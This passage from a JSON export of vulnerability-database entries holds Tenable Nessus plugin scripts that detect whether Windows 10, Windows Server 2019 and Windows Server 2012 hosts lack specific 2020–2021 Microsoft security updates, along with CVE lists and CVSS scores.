vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-26879,\n CVE-2021-26886)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-26892)\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000802-os-builds-19041-867-and-19042-867-63552d64-fe44-4132-8813-ef56d3626e14\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8437e591\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5000802.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-27070\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-26881\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-03';\nkbs = make_list(\n '5000802'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19041',\n rollup_date:'03_2021',\n bulletin:bulletin,\n rollup_kb_list:[5000802])\n|| \n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19042',\n rollup_date:'03_2021',\n bulletin:bulletin,\n rollup_kb_list:[5000802])\n\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-13T15:09:22", "description": "The remote Windows host is missing security update 5000808.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-1729, CVE-2021-24090, CVE-2021-24095, CVE-2021-26860, CVE-2021-26862, CVE-2021-26863, CVE-2021-26864, CVE-2021-26865, CVE-2021-26866, CVE-2021-26868, CVE-2021-26870, CVE-2021-26871, CVE-2021-26872, CVE-2021-26873, CVE-2021-26874, CVE-2021-26875, CVE-2021-26878, CVE-2021-26880, CVE-2021-26882, CVE-2021-26885, CVE-2021-26889, CVE-2021-26891, CVE-2021-26898, CVE-2021-26899, CVE-2021-26900, CVE-2021-26901, CVE-2021-27077)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-24107, CVE-2021-26869, CVE-2021-26884)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26861, CVE-2021-26867, CVE-2021-26876, CVE-2021-26881, CVE-2021-26890, CVE-2021-27085)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-26879, CVE-2021-26886)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-26892)", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-03-09T00:00:00", "type": "nessus", "title": "KB5000808: Windows 10 Version 1909 March 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1640", "CVE-2021-1729", "CVE-2021-24090", "CVE-2021-24095", "CVE-2021-24107", "CVE-2021-26411", "CVE-2021-26860", "CVE-2021-26861", "CVE-2021-26862", "CVE-2021-26863", "CVE-2021-26864", "CVE-2021-26865", "CVE-2021-26866", "CVE-2021-26867", "CVE-2021-26868", "CVE-2021-26869", "CVE-2021-26870", "CVE-2021-26871", "CVE-2021-26872", "CVE-2021-26873", "CVE-2021-26874", "CVE-2021-26875", "CVE-2021-26876", "CVE-2021-26878", "CVE-2021-26879", "CVE-2021-26880", "CVE-2021-26881", "CVE-2021-26882", "CVE-2021-26884", "CVE-2021-26885", "CVE-2021-26886", "CVE-2021-26889", "CVE-2021-26890", "CVE-2021-26891", "CVE-2021-26892", "CVE-2021-26898", "CVE-2021-26899", "CVE-2021-26900", "CVE-2021-26901", "CVE-2021-27077", "CVE-2021-27085"], "modified": "2022-05-10T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_MAR_5000808.NASL", "href": "https://www.tenable.com/plugins/nessus/147220", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147220);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/10\");\n\n script_cve_id(\n \"CVE-2021-1640\",\n \"CVE-2021-1729\",\n \"CVE-2021-24090\",\n \"CVE-2021-24095\",\n \"CVE-2021-24107\",\n \"CVE-2021-26411\",\n \"CVE-2021-26860\",\n \"CVE-2021-26861\",\n \"CVE-2021-26862\",\n \"CVE-2021-26863\",\n \"CVE-2021-26864\",\n \"CVE-2021-26865\",\n \"CVE-2021-26866\",\n \"CVE-2021-26867\",\n \"CVE-2021-26868\",\n \"CVE-2021-26869\",\n \"CVE-2021-26870\",\n \"CVE-2021-26871\",\n \"CVE-2021-26872\",\n \"CVE-2021-26873\",\n \"CVE-2021-26874\",\n \"CVE-2021-26875\",\n \"CVE-2021-26876\",\n \"CVE-2021-26878\",\n \"CVE-2021-26879\",\n \"CVE-2021-26880\",\n \"CVE-2021-26881\",\n \"CVE-2021-26882\",\n \"CVE-2021-26884\",\n \"CVE-2021-26885\",\n \"CVE-2021-26886\",\n \"CVE-2021-26889\",\n \"CVE-2021-26890\",\n \"CVE-2021-26891\",\n \"CVE-2021-26892\",\n \"CVE-2021-26898\",\n \"CVE-2021-26899\",\n \"CVE-2021-26900\",\n \"CVE-2021-26901\",\n \"CVE-2021-27077\",\n \"CVE-2021-27085\"\n );\n script_xref(name:\"MSKB\", value:\"5000808\");\n script_xref(name:\"MSFT\", value:\"MS21-5000808\");\n script_xref(name:\"IAVA\", value:\"2021-A-0131\");\n script_xref(name:\"IAVA\", value:\"2021-A-0129-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0130-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0134-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB5000808: Windows 10 Version 1909 March 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5000808.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-1729, CVE-2021-24090,\n CVE-2021-24095, CVE-2021-26860, CVE-2021-26862,\n CVE-2021-26863, CVE-2021-26864, CVE-2021-26865,\n CVE-2021-26866, CVE-2021-26868, CVE-2021-26870,\n CVE-2021-26871, CVE-2021-26872, CVE-2021-26873,\n CVE-2021-26874, CVE-2021-26875, CVE-2021-26878,\n CVE-2021-26880, CVE-2021-26882, CVE-2021-26885,\n CVE-2021-26889, CVE-2021-26891, CVE-2021-26898,\n CVE-2021-26899, CVE-2021-26900, CVE-2021-26901,\n CVE-2021-27077)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-24107, CVE-2021-26869,\n CVE-2021-26884)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26861,\n CVE-2021-26867, CVE-2021-26876, CVE-2021-26881,\n CVE-2021-26890, CVE-2021-27085)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-26879,\n CVE-2021-26886)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-26892)\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000808-os-build-18363-1440-6989940a-252d-48f3-a2a7-a42bf19fa2c8\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c8c6d108\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5000808.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-24090\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-26881\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-03';\nkbs = make_list(\n '5000808'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'18363',\n rollup_date:'03_2021',\n bulletin:bulletin,\n rollup_kb_list:[5000808])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-25T20:32:48", "description": "The remote Windows host is missing security update 5000822.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-1729, CVE-2021-24095, CVE-2021-26860, CVE-2021-26862, CVE-2021-26863, CVE-2021-26864, CVE-2021-26865, CVE-2021-26866, CVE-2021-26868, CVE-2021-26870, CVE-2021-26872, CVE-2021-26873, CVE-2021-26874, CVE-2021-26875, CVE-2021-26878, CVE-2021-26880, CVE-2021-26882, CVE-2021-26889, CVE-2021-26891, CVE-2021-26898, CVE-2021-26899, CVE-2021-26901, CVE-2021-27077)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-24107, CVE-2021-26869, CVE-2021-26884)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26861, CVE-2021-26876, CVE-2021-26877, CVE-2021-26881, CVE-2021-26890, CVE-2021-26893, CVE-2021-26894, CVE-2021-26895, CVE-2021-26897, CVE-2021-27085)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-26879, CVE-2021-26886, CVE-2021-26896, CVE-2021-27063)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-26892)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-03-09T00:00:00", "type": "nessus", "title": "KB5000822: Windows 10 Version 1809 and Windows Server 2019 March 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1640", "CVE-2021-1729", "CVE-2021-24095", "CVE-2021-24107", "CVE-2021-26411", "CVE-2021-26860", "CVE-2021-26861", "CVE-2021-26862", "CVE-2021-26863", "CVE-2021-26864", "CVE-2021-26865", "CVE-2021-26866", "CVE-2021-26868", "CVE-2021-26869", "CVE-2021-26870", "CVE-2021-26872", "CVE-2021-26873", "CVE-2021-26874", "CVE-2021-26875", "CVE-2021-26876", "CVE-2021-26877", "CVE-2021-26878", "CVE-2021-26879", "CVE-2021-26880", "CVE-2021-26881", "CVE-2021-26882", "CVE-2021-26884", "CVE-2021-26886", "CVE-2021-26889", "CVE-2021-26890", "CVE-2021-26891", "CVE-2021-26892", "CVE-2021-26893", "CVE-2021-26894", "CVE-2021-26895", "CVE-2021-26896", "CVE-2021-26897", "CVE-2021-26898", "CVE-2021-26899", "CVE-2021-26901", "CVE-2021-27063", "CVE-2021-27077", "CVE-2021-27085"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_MAR_5000822.NASL", "href": "https://www.tenable.com/plugins/nessus/147223", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147223);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2021-1640\",\n \"CVE-2021-1729\",\n \"CVE-2021-24095\",\n \"CVE-2021-24107\",\n \"CVE-2021-26411\",\n \"CVE-2021-26860\",\n \"CVE-2021-26861\",\n \"CVE-2021-26862\",\n \"CVE-2021-26863\",\n \"CVE-2021-26864\",\n \"CVE-2021-26865\",\n \"CVE-2021-26866\",\n \"CVE-2021-26868\",\n \"CVE-2021-26869\",\n \"CVE-2021-26870\",\n \"CVE-2021-26872\",\n \"CVE-2021-26873\",\n \"CVE-2021-26874\",\n \"CVE-2021-26875\",\n \"CVE-2021-26876\",\n \"CVE-2021-26877\",\n \"CVE-2021-26878\",\n \"CVE-2021-26879\",\n \"CVE-2021-26880\",\n \"CVE-2021-26881\",\n \"CVE-2021-26882\",\n \"CVE-2021-26884\",\n \"CVE-2021-26886\",\n \"CVE-2021-26889\",\n \"CVE-2021-26890\",\n \"CVE-2021-26891\",\n \"CVE-2021-26892\",\n \"CVE-2021-26893\",\n \"CVE-2021-26894\",\n \"CVE-2021-26895\",\n \"CVE-2021-26896\",\n \"CVE-2021-26897\",\n \"CVE-2021-26898\",\n \"CVE-2021-26899\",\n \"CVE-2021-26901\",\n \"CVE-2021-27063\",\n \"CVE-2021-27077\",\n \"CVE-2021-27085\"\n );\n script_xref(name:\"MSKB\", value:\"5000822\");\n script_xref(name:\"MSFT\", value:\"MS21-5000822\");\n script_xref(name:\"IAVA\", value:\"2021-A-0129-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0130-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0131\");\n script_xref(name:\"IAVA\", value:\"2021-A-0134-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB5000822: Windows 10 Version 1809 and Windows Server 2019 March 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5000822.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-1729, CVE-2021-24095,\n CVE-2021-26860, CVE-2021-26862, CVE-2021-26863,\n CVE-2021-26864, CVE-2021-26865, CVE-2021-26866,\n CVE-2021-26868, CVE-2021-26870, CVE-2021-26872,\n CVE-2021-26873, CVE-2021-26874, CVE-2021-26875,\n CVE-2021-26878, CVE-2021-26880, CVE-2021-26882,\n CVE-2021-26889, CVE-2021-26891, CVE-2021-26898,\n CVE-2021-26899, CVE-2021-26901, CVE-2021-27077)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-24107, CVE-2021-26869,\n CVE-2021-26884)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26861,\n CVE-2021-26876, CVE-2021-26877, CVE-2021-26881,\n CVE-2021-26890, CVE-2021-26893, CVE-2021-26894,\n CVE-2021-26895, CVE-2021-26897, CVE-2021-27085)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-26879,\n CVE-2021-26886, CVE-2021-26896, CVE-2021-27063)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-26892)\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000822-os-build-17763-1817-2eb6197f-e3b1-4f42-ab51-84345e063564\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1b432623\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5000822.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26895\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nvar bulletin = 'MS21-03';\nvar kbs = make_list(\n '5000822'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nvar share = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'17763',\n rollup_date:'03_2021',\n bulletin:bulletin,\n rollup_kb_list:[5000822])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-23T15:11:47", "description": "The Windows installation on the remote host is missing security update 4586781. It is, therefore, affected by multiple vulnerabilities. Please review the vendor advisory for more details.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-11-10T00:00:00", "type": "nessus", "title": "KB4586808: Windows Server 2012 November 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1599", "CVE-2020-16997", "CVE-2020-17000", "CVE-2020-17001", "CVE-2020-17004", "CVE-2020-17011", "CVE-2020-17014", "CVE-2020-17024", "CVE-2020-17029", "CVE-2020-17036", "CVE-2020-17038", "CVE-2020-17041", "CVE-2020-17042", "CVE-2020-17043", "CVE-2020-17044", "CVE-2020-17045", "CVE-2020-17047", "CVE-2020-17049", "CVE-2020-17051", "CVE-2020-17052", "CVE-2020-17056", "CVE-2020-17068", "CVE-2020-17069", "CVE-2020-17088"], "modified": "2021-06-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_NOV_4586834.NASL", "href": "https://www.tenable.com/plugins/nessus/142687", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(142687);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/06/03\");\n\n script_cve_id(\n \"CVE-2020-1599\",\n \"CVE-2020-16997\",\n \"CVE-2020-17000\",\n \"CVE-2020-17001\",\n \"CVE-2020-17004\",\n \"CVE-2020-17011\",\n \"CVE-2020-17014\",\n \"CVE-2020-17024\",\n \"CVE-2020-17029\",\n \"CVE-2020-17036\",\n \"CVE-2020-17038\",\n \"CVE-2020-17041\",\n \"CVE-2020-17042\",\n \"CVE-2020-17043\",\n \"CVE-2020-17044\",\n \"CVE-2020-17045\",\n \"CVE-2020-17047\",\n \"CVE-2020-17049\",\n \"CVE-2020-17051\",\n \"CVE-2020-17052\",\n \"CVE-2020-17056\",\n \"CVE-2020-17068\",\n \"CVE-2020-17069\",\n \"CVE-2020-17088\"\n );\n script_xref(name:\"MSKB\", value:\"4586808\");\n script_xref(name:\"MSKB\", value:\"4586834\");\n script_xref(name:\"MSFT\", value:\"MS20-4586808\");\n script_xref(name:\"MSFT\", value:\"MS20-4586834\");\n script_xref(name:\"IAVA\", value:\"2020-A-0513-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0518-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0521-S\");\n\n script_name(english:\"KB4586808: Windows Server 2012 November 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Windows installation on the remote host is missing security update 4586781. It is, therefore,\n affected by multiple vulnerabilities. Please review the vendor advisory for more details.\");\n # https://support.microsoft.com/en-us/help/4586808/windows-server-2012-update\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d0d6d9b2\");\n # https://support.microsoft.com/en-us/help/4586834/windows-server-2012-update\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?82b0555c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4586808 or Cumulative Update KB4586834.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-17051\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin 